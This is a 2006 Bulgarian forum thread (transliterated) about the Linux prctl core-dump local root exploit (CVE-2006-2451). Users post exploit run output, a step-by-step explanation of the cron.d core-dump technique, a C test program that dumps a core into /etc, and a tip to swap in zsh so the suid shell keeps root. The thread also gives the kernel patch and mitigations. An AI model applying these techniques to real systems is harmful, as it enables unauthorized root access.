Po-skoro ne :(
Ot: Stoian Ivanov <sdr__at__mail[ tochka ]bg>
Na: 12-07-2006@10:38 GMT+2
Otsenka: 1/Neutralensdr@sdr /space $ gcc -o rs_prctl_kernel rs_prctl_kernel.c
sdr@sdr /space $ ./rs_prctl_kernel
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]
[*] Creating Cron entry
[*] Sleeping for aprox. one minute (** please wait **)
[*] Running shell (remember to remove /tmp/sh when finished) ...
sh: /tmp/sh: No such file or directory
sdr@sdr /space $ uname -a
Linux sdr 2.6.17-gentoo-r2 #1 PREEMPT Fri Jul 7 16:07:54 EEST 2006 i686 AMD Sempron(tm) 2500+ AuthenticAMD GNU/Linux
sdr@sdr /space $
[Otgovori na tozi komentar]
Kum: Po-skoro ne :(
Ot: gat3way
Na: 12-07-2006@10:53 GMT+2
Otsenka: 1/Neutralensdr, iadroto ti e pach-nato zatova ne stava.
Iskam samo da kazha, che ne se nalaga da sledvate tezi advisories 1:1 i da si smeniate iadroto, za da se zashtitite. Dostatuchno e da dobavite tezi 2 reda v /etc/security/limits.conf (stiga da polzvate PAM):
* hard core 1
* soft core 1
<prazen red>
Taka eksploita elegantno biva pretsakan, tui kato v ramkite na 1kb coredump po nikakuv nachin ne bi moglo da se pobere koda na /bin/sh.
sysctl-to fs.suid_dumpable bi sledvalo da reshi problema ako e ravno na 0 ili na 2, pone spored dokumentatsiiata, no pri mene i s 3-te vuzmozhni stoinosti eksploita si raboti..
[Otgovori na tozi komentar]
Kum: Kum: Po-skoro ne :(
Ot: growchie <growchie__at__yahoo< dot >com>
Na: 12-07-2006@12:13 GMT+2
Otsenka: 1/Neutralentova s razmera na core niama da ti reshi problema. payload ti e pod 200 baita.
Qvno gentoo e pachnato dosta otdavna.
Redaktiran na: 12-07-2006@12:15
[Otgovori na tozi komentar]
Kum: Kum: Kum: Po-skoro ne :(
Ot: gat3way <mrangelov__at__globul__dot__bg>
Na: 12-07-2006@12:51 GMT+2
Otsenka: 2/Obrazovasht/Mudur
Vsushtnost sega go poglednah sorsa po-dobre.
Goleminata na payload-a ima niakakvo otnoshenie, no ne e opredeliashta, spokoino mozheshe dori 10 baita da e i pak coredump limit ot 1 kb shte go spre.
Znachi sega purvo shte obiasnia ideiata na eksploita (i zashto nikude *payload ne se podava kato parametur)
1) rezervira se pamet, koiato se zapulva s opredelena stoinost (payload). Vazhno, mnogo vazhno e che stringut s koito se initsializira tazi pamet stoi v cleartext v binary-to na kompiliraniia eksploit, t.e:
gat3way@gat3way:~$ grep /tmp/sh /tmp/exploit
Binary file /tmp/exploit matches
2) fork-va se child protses. prctl viknat po tozi nachin kara coredump-a mu da bude zapisan s root privilegii. Vdigat se limitite za golemina na coredump do maksimuma vuzmozhen (t.e hard limit-a, nalozhen ot root-a)
3) Roditelskiia protses trepe child-a sus SIGSEGV (koeto puk po printsip kara iadroto da pravi coredump - image na pametta, zaeta ot segfolt-nalata programa)
4) V /etc/cron.d (kudeto se dump-va) - vseki fail se izpulniava pri polozhenie che e vuv format podoben na /etc/crontab.
5) cron proveriava vsiaka minuta dali ima neshto v cron.d pri koeto otkriva core faila. Zatova se praviat i tezi magii sus sleep, za da e sigurno che kron-a shte mine pone vednuzh (na krugla minuta)
6) Preskachaiki nishto ne oznachavashtite binary gluposti ot dumpa, kron demona stiga do momenta vuv nego, kudeto se pazi stringa s koito se initsializira payload
6) Toi kara kron-a da izpulni loshata komanda kato root (kopirai suid-nat /bin/sh drugade)
7) izpulniava go (/tmp/sh). Vseki znae kakvo stava ako izpulnish shel, chiito pritezhatel e root i ima dignat suid flag...
-----------------
Zashto coredump limit ot 1 kb reshava efektivno problema?
- kompiliran na moiata mashina tozi string e na pozitsiia 1913 ot 8341-baitoviia kompiliran eksploit. Dori da se dumpne chast ot pametta do 1 kb, tozi string vuobshte ne vliza v smetkite.
- drug e vuprosa, che pri takuv limit niama da se dump-ne nishto, tui kato iadroto ne pravi coredump ako izpolzvanata ot protsesa pamet e poveche ot limita, t.e ne se dump-va samo chast ot pametta, a vuobshte nishto. Tova e prichinata, ako imash set-nat hard limit, da ne vidish nikakuv core fail v /etc/cron.d. Vupreki che onova rm -f /etc/cron.d/core v payload-a niama da se izpulni vuobshte.
[Otgovori na tozi komentar]
Kum: Kum: Kum: Kum: Po-skoro ne :(
Ot: growchie <growchie< at >yahoo __tochka__ com>
Na: 12-07-2006@13:06 GMT+2
Otsenka: 1/Neutralenaha emi super. tova za core failovete e dobre da seznae, ponezhe sa si opasni kato tsialo. shte vzema i az da si nalozha hard ogranicheniiata. problema e, cha taka napisan eksploita nishto ne proveriava i dosta hora mozhe da ostanat s vpechatrenie, che sa nared.
[Otgovori na tozi komentar]
Kum: Kum: Kum: Kum: Kum: Po-skoro ne :(
Ot: gat3way
Na: 12-07-2006@13:18 GMT+2
Otsenka: 1/NeutralenIzviniavam se, mozhe da imash tvurd limit i pak da mine eksploita, imah predvid *dostatuchno_nisuk_tvurd_limit*
Drugo - triabva da bude set-nat ot root, tui kato eksploita sam si vdiga limita dokolkoto mu e pozvoleno.
[Otgovori na tozi komentar]
Kum: Kum: Kum: Kum: Kum: Po-skoro ne :(
Ot: gat3way
Na: 12-07-2006@18:28 GMT+2
Otsenka: 1/NeutralenDamm mnogo prilozheniia, praveshti avtentikatsiia sreshtu /etc/passwd primerno niamat navika da nulirat niakoi svoi promenlivi...otkudeto trugvat mnogo bedi :)
[Otgovori na tozi komentar]
Kum: Kum: Po-skoro ne :(
Ot: gustav
Na: 13-07-2006@11:01 GMT+2
Otsenka: 1/Neutralenpusna mi shell, no ne ne e s root prava :-)
Linux venera.code.bg 2.6.16-3mdk #1 Wed Jun
28 20:23:44 CEST 2006 i686 Intel(R)
Pentium(R) 4 CPU 2.40GHz unknown GNU/Linux
[Otgovori na tozi komentar]
Kum: Po-skoro ne :(
Ot: exabyte <exabyte (a) 3mhz __tochka__ net>
Na: 12-07-2006@15:15 GMT+2
Otsenka: 1/NeutralenExploit-a ne e konstruiran, taka che da raboti na vsiakakvi sistemi. Moiata naprimer e uiazvima, no toi ne raboti. Imaite predvid, kogato testvate.
Za nai-sigurno suzdaite direktoriia /etc/cron.d i vizhte dali v neia se poiaviava core fail.
[Otgovori na tozi komentar]
Kum: Po-skoro ne :(
Ot: growchie <growchie (a) yahoo__dot__com>
Na: 12-07-2006@11:06 GMT+2
Otsenka: 1/NeutralenNiakoi na iasno li e char *payload kato parametur na koe se podava?
Hm ne se podava. gova po-skoro se dumpi.
Redaktiran na: 12-07-2006@11:08
[Otgovori na tozi komentar]
Kum: Po-skoro ne :(
Ot: Admire
Na: 12-07-2006@10:54 GMT+2
Otsenka: 1/NeutralenAz probvah na 3 Gentoo mashini, ednata s iadro 2.6.13-gentoo-r5, i ne raboti.
[Otgovori na tozi komentar]
Mai neshto se duni!
Ot: daninel
Na: 12-07-2006@10:48 GMT+2
Otsenka: 1/Neutralendaninel@monsters:/tmp$ ./a.out
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]
[*] Creating Cron entry
[*] Sleeping for aprox. one minute (** please wait **)
[*] Running shell (remember to remove /tmp/sh when finished) ...
sh: /tmp/sh: No such file or directory
daninel@monsters:/tmp$ uname
Linux
daninel@monsters:/tmp$ uname -a
Linux monsters 2.6.16.24 #2 PREEMPT Mon Jul 10 17:29:33 EEST 2006 i686 athlon-4 i386 GNU/Linux
daninel@monsters:/tmp$
V 2.6.16.24 buga e opraven - ne sa mo v 2.6.17.4
commit 407972755b44d0a18647dab1f1e62df80b6638d0
Author: Greg Kroah-Hartman <gregkh@suse.de>
Date: Thu Jul 6 13:06:01 2006 -0700
Linux 2.6.16.24
commit 9e4e45f19bdd41b4091e5fe556f816f4046c7598
Author: Greg Kroah-Hartman <gregkh@suse.de>
Date: Thu Jul 6 13:05:42 2006 -0700
fix prctl privilege escalation and suid_dumpable (CVE-2006-2451)
Based on a patch from Ernie Petrides
During security research, Red Hat discovered a behavioral flaw in core
dump handling. A local user could create a program that would cause a
core file to be dumped into a directory they would not normally have
permissions to write to. This could lead to a denial of service (disk
consumption), or allow the local user to gain root privileges.
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
[Otgovori na tozi komentar]
Kak da opravim problema pri 2.6.1h
Ot: daninel
Na: 12-07-2006@11:08 GMT+2
Otsenka: 2/Informirasht
Namerete
case PR_SET_DUMPABLE:
if (arg2 < 0 || arg2 > 2) {
v kernel/sys.c i go zamenete s:
case PR_SET_DUMPABLE:
if (arg2 < 0 || arg2 > 1) {
Razlikata e, che ot 2 stava na 1 pri "arg2 >". Niama nuzhda da smeniate iadroto, no prekompilatsiiata niama kak da se izbegne.
[Otgovori na tozi komentar]
Kum: Kak da opravim problema pri 2.6.1h
Ot: growchie <growchie (a) yahoo __tochka__ com>
Na: 12-07-2006@11:14 GMT+2
Otsenka: 1/NeutralenOHAAAA Gati reshenieto deto dade.
http://www.die.net/doc/linux/man/man2/p...
PR_SET_DUMPABLE
(Since Linux 2.4) Set the state of the flag determining whether core dumps are produced for this process upon delivery of a signal whose default behaviour is to produce a core dump. (Normally this flag is set for a process by default, but it is cleared when a set-user-ID or set-group-ID program is executed and also by various system calls that manipulate process UIDs and GIDs). In kernels up to and including 2.6.12, arg2 must be either 0 (process is not dumpable) or 1 (process is dumpable). Since kernel 2.6.13, the value 2 is also permitted; this causes any binary which normally would not be dumped to be dumped readable by root only. (See also the description of /proc/sys/fs/suid_dumpable in proc(5).)
Ako smenish v red 38 2 s 1 kakvo shte stane niama li da ima pak problem? (Prosto spekuliram ne sum vizhdal koda na sys.c).
[Otgovori na tozi komentar]
Kum: Kak da opravim problema pri 2.6.1h
Ot: growchie <growchie __@__ yahoo[ tochka ]com>
Na: 12-07-2006@11:21 GMT+2
Otsenka: 1/NeutralenAko si prav s tova 2 - parametura za chetene samo ot ruut e razkovnicheto. Triabva da se deligirat privilegii ili pone da se smeni sobstvenostta na dumpa v tozi sluchai. Interesno kak edno neshto misleno da uvelichi sigurnostta v sushtnost ia namaliava :)
Redaktiran na: 12-07-2006@11:51
[Otgovori na tozi komentar]
Kum: Kak da opravim problema pri 2.6.1h
Ot: kip
Na: 14-07-2006@8:06 GMT+2
Otsenka: 1/NeutralenPrekompilirah kernela
kato zamenih tova v kernel/sys.c
case PR_SET_DUMPABLE:
if (arg2 < 0 || arg2 > 2) {
s:
case PR_SET_DUMPABLE:
if (arg2 < 0 || arg2 > 1) {
kakto kazva daninel i neshtata se opraviha
[Otgovori na tozi komentar]
Kum: Kak da opravim problema pri 2.6.1h
Ot: kip
Na: 14-07-2006@8:34 GMT+2
Otsenka: 1/NeutralenTova e ot pacha za iadro 2.6.17.4:
diff --git a/kernel/sys.c b/kernel/sys.c
index 0b6ec0e..59273f7 100644
--- a/kernel/sys.c
+++ b/kernel/sys.c
@@ -1991,7 +1991,7 @@ asmlinkage long sys_prctl(int option, un
error = current->mm->dumpable;
break;
case PR_SET_DUMPABLE:
- if (arg2 < 0 || arg2 > 2) {
+ if (arg2 < 0 || arg2 > 1) {
error = -EINVAL;
break;
}
[Otgovori na tozi komentar]
I pri mene ne stava
Ot: m0rph
Na: 12-07-2006@11:20 GMT+2
Otsenka: 1/Neutralenjack@sgc:~/test$ ./rs_prctl_kernel
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]
[*] Creating Cron entry
[*] Sleeping for aprox. one minute (** please wait **)
[*] Running shell (remember to remove /tmp/sh when finished) ...
sh: /tmp/sh: No such file or directory
jack@sgc:~/test$ uname -a
Linux sgc 2.6.15.1 #3 SMP PREEMPT Sat Feb 4 17:33:38 EET 2006 i686 athlon-4 i386 GNU/Linux
Tova si e standartno 2.6.15.1 iadro svaleno ot kernel.org i kompilirano ot mene.
[Otgovori na tozi komentar]
Kum: I pri mene ne stava
Ot: growchie <growchie< at >yahoo[ tochka ]com>
Na: 12-07-2006@11:45 GMT+2
Otsenka: 1/NeutralenImash li pusnat cron i mozhe li yuzura ti da chete cron direktoriiata?
[Otgovori na tozi komentar]
Kum: Kum: I pri mene ne stava
Ot: m0rph
Na: 12-07-2006@13:25 GMT+2
Otsenka: 1/Neutralencron e pusnat, promenih pravata na /var/spool i poddirektoriite i rezultata beshe sushtiia t.e. nikakuv
[Otgovori na tozi komentar]
Kum: Kum: Kum: I pri mene ne stava
Ot: growchie <growchie< at >yahoo __tochka__ com>
Na: 12-07-2006@13:29 GMT+2
Otsenka: 1/Neutralenpo-skoro v /etc/cron.d se opitva da pishe eksploita.
[Otgovori na tozi komentar]
Ne e mnogo dostoverno
Ot: growchie <growchie (a) yahoo __tochka__ com>
Na: 12-07-2006@11:29 GMT+2
Otsenka: 1/NeutralenOt kakvoto vizhdam v tozi kod se razchita core faila da sudurzha kron komanda za izpulniavane na shel ili neshto drugo. Qvno se razchita niakoi da izpulni tozi fail. Ako se zabraniat pravata za chetene na kron diretkoriiata za vsichki drugi osven kron potrebitelia tova chdir triabva da se provali. Sledovatelno tozi eksploit mozhe i da ne zaraboti poradi tazi prichina, a ne zashtoto kernela e v red. Ako niama kron startiran eksploita sushto niama da sraboti. Taka che ne viarvaite mnogo mnogo na tochno tozi kod.
Niakoi iako iska da probva tova?
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload="Sistemata ne e v red";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating /etc/core\n");
if ( !( child = fork() )) {
chdir("/etc");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Exiting. Check for core file in /etc containing Sistemata ne e v red\n");
}
Redaktiran na: 12-07-2006@11:56
[Otgovori na tozi komentar]
Kum: Ne e mnogo dostoverno
Ot: Stoian Ivanov <sdr< at >mail__dot__bg>
Na: 12-07-2006@13:13 GMT+2
Otsenka: 1/Neutralensdr@sdr ~ $ indent <tst.c
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload = "Sistemata ne e v red";
int
main ()
{
int child;
struct rlimit corelimit;
printf ("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf ("By: dreyer & RoMaNSoFt\n");
printf ("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit (RLIMIT_CORE, &corelimit);
printf ("[*] Creating /etc/core\n");
if (!(child = fork ()))
{
chdir ("/etc");
prctl (PR_SET_DUMPABLE, 2);
sleep (200);
exit (1);
}
kill (child, SIGSEGV);
printf
("[*] Exiting. Check for core file in /etc containing Sistemata ne e v red\n");
}
sdr@sdr ~ $ gcc tst.c -o tst
sdr@sdr ~ $ ./tst
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]
[*] Creating /etc/core
[*] Exiting. Check for core file in /etc containing Sistemata ne e v red
sdr@sdr ~ $ su
Password:
root@sdr ~ # grep 'Sistemata ne e v red' /etc/*
grep: /etc/yp.conf: No such file or directory
root@sdr ~ #
[Otgovori na tozi komentar]
Kum: Kum: Ne e mnogo dostoverno
Ot: growchie <growchie< at >yahoo__dot__com>
Na: 12-07-2006@13:18 GMT+2
Otsenka: 1/Neutralenemi super
Redaktiran na: 12-07-2006@13:25
[Otgovori na tozi komentar]
Tozi eksploit e ot vida ako i ako i ako ..
Ot: Stoian Ivanov <sdr __@__ mail< dot >bg>
Na: 12-07-2006@11:35 GMT+2
Otsenka: 1/NeutralenProdukshun kernel s debug optsii pusnati? m? Ne che e losho che sa go hvanali i fiksnali de ma pone ne razprostraniavaite FUD
Redaktiran na: 12-07-2006@11:35
[Otgovori na tozi komentar]
Gluposti
Ot: Linux TorWald
Na: 12-07-2006@12:05 GMT+2
Otsenka: 1/NeutralenGluposti, tova da ne ti e Windoze? !!! :-P
[Otgovori na tozi komentar]
Hmmm, ami
Ot: smelkomar
Na: 12-07-2006@14:03 GMT+2
Otsenka: 1/NeutralenA neshto otnosno BSD, ima li takuv problem s nego?
[Otgovori na tozi komentar]
Kum: Hmmm, ami
Ot: Stoian Ivanov <sdr< at >mail __tochka__ bg>
Na: 12-07-2006@14:32 GMT+2
Otsenka: 1/NeutralenCHe to na BSD ima li koi da mu napravi odit ta da se vidi dali ima podobni problemi?
[Otgovori na tozi komentar]
Kum: Kum: Hmmm, ami
Ot: growchie <growchie (a) yahoo[ tochka ]com>
Na: 12-07-2006@15:21 GMT+2
Otsenka: 1/Neutralentam mai niama prctl(). Ama ne sum siguren.
[Otgovori na tozi komentar]
Kubuntu s kernel 2.6.15-25
Ot: growchie <growchie __@__ yahoo[ tochka ]com>
Na: 12-07-2006@15:33 GMT+2
Otsenka: 1/NeutralenNe e pachnato. Vnimavaite!
Abe tiia ludi li sa kak taka sa ostavili
root direktoriiata s 40755 prava.
Bezobrazie!
Prava 40700 obezsmisliat eksploita.
Produlzhenie: Problemut izglezhda razreshen v
2.6.15-26
Redaktiran na: 12-07-2006@16:05
[Otgovori na tozi komentar]
gentoo - raboti doniakude
Ot: AngelFire <af__at__0xAF[ tochka ]org>
Na: 13-07-2006@17:09 GMT+2
Otsenka: 1/Neutralenna moeto gentoo s po-star kernel raboti do izvestna stepen ...
af@mobile ~ $ ls -lad /tmp/
drwxrwxrwt 63 root root 32768 2006-07-13 20:00 /tmp/
[edna minuta ne vinagi e dostatuchna pri men i se nalozhi da go pusna 2-3 puti za da se zaseka s cron demona]
af@mobile ~ $ ./a.out
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]
[*] Creating Cron entry
[*] Sleeping for aprox. one minute (** please wait **)
[*] Running shell (remember to remove /tmp/sh when finished) ...
sh-3.1$ id -a
uid=1000(af) gid=100(users) groups=6(disk),10(wheel),11(floppy),17(console),18(audio),19(cdrom),26(tape),27(video),35(games),80(cdrw),84(nut),85(usb),100(users),250(portage),413(vmware),414(qemu)
sh-3.1$ cat /etc/shadow
cat: /etc/shadow: Permission denied
sh-3.1$ ls -la /tmp/sh
-rwsr-xr-x 1 root root 645852 2006-07-13 20:07 /tmp/sh
sh-3.1$ uname -a
Linux mobile 2.6.16-suspend2-r8-af #1 Mon Jul 10 16:35:53 EEST 2006 i686 Intel(R) Pentium(R) M processor 1.70GHz GenuineIntel GNU/Linux
kakto se zabeliazva (pone na pruv pogled) eksploita srabotva pravilno ... samo deto ne mi dava root prava ... no veroiatno e neshto v nastroikite na sistemata mi...
veroiatno ima niakakva hvatka sus /tmp i suid shela mi ... inache ne vizhdam prichina da ne mi dade root prava
edit:
opitah i na druga gentoo mashina:
Linux angelfire 2.6.15-gentoo-af #1 SMP PREEMPT Fri Jan 6 18:50:49 EET 2006 i686 Intel(R) Pentium(R) 4 CPU 2.40GHz GNU/Linux
abs. sushtiia efekt... niama root
Redaktiran na: 13-07-2006@17:16
[Otgovori na tozi komentar]
Qvno na debian e prorabotilo
Ot: growchie <growchie< at >yahoo[ tochka ]com>
Na: 13-07-2006@19:08 GMT+2
Otsenka: 1/NeutralenVizhte novinata za gluck.debian.org
[Otgovori na tozi komentar]
Kum: gentoo - raboti doniakude
Ot: zinder
Na: 14-07-2006@7:01 GMT+2
Otsenka: 1/Neutralenima si leka vrytka :) exploita si raboti chudesno taka che slgai 2.6.17.4 na nego ne raboti sas sigornost!
[Otgovori na tozi komentar]
Kum: gentoo - raboti doniakude
Ot: ivan <iivanov< at >abv__dot__bg>
Na: 13-07-2006@21:45 GMT+2
Otsenka: 1/NeutralenDa no tova e konkretno neshto v Gentoo-to, probvah na debian mashina s posledniia gentoo-hardened-2.6.14-r8 i si bachka kato pich, sumniava me che v gentoo nali sam si izbirash kakuv cron da slozhish za tova ne raboti. Pfu ebati hardened-a :)))
[Otgovori na tozi komentar]
Kum: Kum: gentoo - raboti doniakude
Ot: AngelFire <af< at >0xAF[ tochka ]org>
Na: 14-07-2006@8:57 GMT+2
Otsenka: 1/Neutralenmne ... niama da e ot cron-a ... toi si svurshva rabotata ... kopira mi /tmp/sh vsichko si minava po voda ... samo deto trbva da imam root prava no napraktika niamam
[Otgovori na tozi komentar]
bre, binki niama tozi problem
Ot: Karaman <vandread< at >abv__dot__bg>
Na: 14-07-2006@7:38 GMT+2
Otsenka: 1/Neutraleni ne sum pachval iadro dokolkoto si spomniam :)
testvano na:
Linux binki 2.6.16.2 #15 SMP PREEMPT Tue Jun 20 23:50:46 EEST 2006 i686 athlon-4 i386 GNU/Linux
rezultat:
karaman@binki:~$ ./rs_prctl_kernel
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]
[*] Creating Cron entry
[*] Sleeping for aprox. one minute (** please wait **)
[*] Running shell (remember to remove /tmp/sh when finished) ...
sh: /tmp/sh: No such file or directory
drugoto mi dava:
-su: ./test.o: Permission denied
interesno eksploitche btv
Redaktiran na: 14-07-2006@7:46
[Otgovori na tozi komentar]
koito ne vqrva che raboti ....
Ot: zinder
Na: 14-07-2006@13:37 GMT+2
Otsenka: 1/Neutralenkoito misli che exploita ne raboti za izbroenite qdra znachi ne znae kak se raboti s exploita (da ne zabravqme che si trqbva i malko fantaziq :))!!!Prosto hora ne znaete kak se pravi ... stiga ste govorili gluposti che pochnah da se draznq:)
[Otgovori na tozi komentar]
edno malko problemche
Ot: fen386 <zonered __@__ mail< dot >bg>
Na: 14-07-2006@16:07 GMT+2
Otsenka: 1/NeutralenTaka...
Ot C razbirate, ama ot shell-ove - ne chak tolkova :)
TSitat (ot gateway):
" izpulniava go (/tmp/sh). Vseki znae kakvo stava ako izpulnish shel, chiito pritezhatel e root i ima dignat suid flag..."
BASH SHel NE mozhete da startirate pod obiknoven potrebitel, taka che da imash ruut privilegii, dori da ima suid flag. Uiazvim shel e naprimer ZSH. Ako go imate instaliran (povecheto distrota go imat), to zamenete cp /bin/sh /tmp/sh s cp /bin/zsh /tmp/sh i shte stane :)
[Otgovori na tozi komentar]
Kum: edno malko problemche
Ot: gat3way <mrangelov__at__globul[ tochka ]bg>
Na: 14-07-2006@22:03 GMT+2
Otsenka: 1/Neutralenmozhem spokoino :)
gat3way@debian:/tmp$ cp /bin/sh /tmp
gat3way@debian:/tmp$ su -c "chown root:root sh"
Password:
gat3way@debian:/tmp$ su -c "chmod u+s sh"
Password:
gat3way@debian:/tmp$ ls -l sh
-rwsr-xr-x 1 root root 625228 2006-07-15 01:57 sh
gat3way@debian:/tmp$ ./sh
sh-2.05b# id
uid=1000(gat3way) gid=1000(gat3way) euid=0(root) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(gat3way)
Zabelezhka: nema selinux
[Otgovori na tozi komentar]
Debian Sarge
Ot: Georgi Tellalov
Na: 16-07-2006@10:11 GMT+2
Otsenka: 1/NeutralenProbvah go na Debian Sardzh i ne stana. Posle go probvah na Debian Sardzh s iadro 2.6.15-1-amd64-k8 ot backports.org i tam stana. Mnogo elegantno reshenie prochetoh v edin ot blogovete na planeta Debian - dobavete si reda:
kernel.core_pattern=/root/core
v /etc/sysctl.conf i eksploitut veche ne raboti.
Redaktiran na: 16-07-2006@10:11
[Otgovori na tozi komentar]
Kum: Debian Sarge
Ot: gerasim
Na: 16-07-2006@13:55 GMT+2
Otsenka: 1/Neutralene az za t'va sum na BSD :)
kakto i da e, nikoi ne kazva nishto za tova - http://milw0rm.com/exploits/2013
a ia vizhte tuk kakvo interesno neshto ima, pri men pod FreeBSD proraboti: http://milw0rm.com/exploits/1596
[Otgovori na tozi komentar]